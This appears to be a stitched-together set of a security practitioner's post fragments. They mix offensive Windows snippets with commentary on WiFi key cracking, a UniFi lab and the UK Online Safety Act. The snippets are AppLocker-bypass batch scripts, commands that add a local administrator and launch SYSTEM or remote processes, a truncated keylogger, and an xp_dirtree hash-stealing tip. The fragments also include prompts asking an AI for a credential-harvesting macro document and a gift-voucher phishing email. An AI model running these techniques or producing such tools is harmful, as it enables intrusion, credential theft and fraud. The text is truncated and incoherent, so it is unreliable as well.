Find writeable folders in c:\windows to bypass AppLocker
@echo off
for /f "delims=" %%a in ('dir /b /ad "c:\windows"') do (
icacls "c:\windows\%%a" | find ":(W)"
rem %errorlevel% is expanded once when the whole block is parsed, so test the live value instead
if not errorlevel 1 echo "c:\windows\%%a is writable"
)
Try and bypass AppLocker
@echo off
for /f "delims=" %%a in ('dir /b /ad "c:\windows"') do (
echo Testing directory: "c:\windows\%%a"
echo "This file is a test." > "c:\windows\%%a\testfile.txt"
if not errorlevel 1 (
echo "c:\windows\%%a is writable"
del…
make me a DLL that runs calc.exe and show me how to execute it via rundll32.exe
make me a cred harvester document in WORD using macros!
Send an email asking for gift vouchers urgently... LOL
net localgroup administrators /add DOMAIN\Username
ok this one is a bit odd..
psexec -i -s cmd.exe
//this will RUN as LOCAL SYSTEM
wmic /node:<remote_computer_name> /user:<username> process call create "<command_to_run>"
namespace Keylogger
{
class Program
{
static void Main(string[] args)
{
// Create a file stream for the log file
StreamWriter logfile = new…
INSERT INTO MyTable (ID, Filename, Filedata)
SELECT ROW_NUMBER() OVER (ORDER BY sub.[file]) AS ID,
sub.[file] AS Filename,
BulkColumn AS Filedata
FROM OPENROWSET(BULK…
Steal hashes by using xp_dirtree to read a file from a server running responder/inveigh ;)
#######################
CREATE TABLE MyTable (
ID int PRIMARY KEY,
Filename varchar(255),
Filedata varchar(MAX)
);
Firstly the TP-Link to show how poor their defaults are (on most of their kit I find ITW)
You can crack the key space here in 4 minutes on a laptop with no mega GPU
One of the WiFi participants managed to capture the key material and then crack the hashes from the TP-link so they won some swag! (A shadow router and a tp link usb WiFi adaptor #ironic)
What didn’t work during the workshop was capturing a hash from the WPA2 PSK network on the UniFi gear…. And I don’t know why!
So time to investigate!
ok so to explain the UNIFI setup a bit:
we have a Unifi Express 7! This has an ethernet WAN port. So because we want to have this as a mobile lab, we combine it with a GL-iNet Router via ethernet then we can use that router to get an internet connection (either WIFI repeater, Ethernet, USB 4G Modem)
(we could use other kit but this works well)
so here we have the GL-AXT1800 in WIFI repeater mode! so now our UNIFI router has internet access!
so here we have the UniFi Console dashboard!
Next step let's go check out the wireless networks!
What could happen when you ban or put barriers in front of things on the internet?
Surely nothing bad could happen, because you are restricting or banning the bad thing right! *inserts Anakin/Padme meme*
#OnlineSafetyAct #UK
So let's look at the scenario:
Controls have been placed in front of adult content sites (where the visitor is 'from the UK')
Introducing the Online Safety Act (a UK Law which applies to UK Citizens/UK Organisations) - sitting in a global internet! (that's important to recognise)
looks similar to almost every org I've worked with (super broad generalisation)
legacy systems oh my! wait till we see what runs in the private sector! (don't tell anyone about those 2008 servers!)
This might sound doom and gloom but having a view of maturity/resilience across the government is a great thing! you can't address what you don't 'know' about!
This paragraph sounds in line with most orgs (IMHO)
I've been conducting maturity assessments for orgs of all shapes and sizes for a long long time! lots of people say they are a 3 when they are in fact a 1-2 (if we are using CMMi-SCV etc.)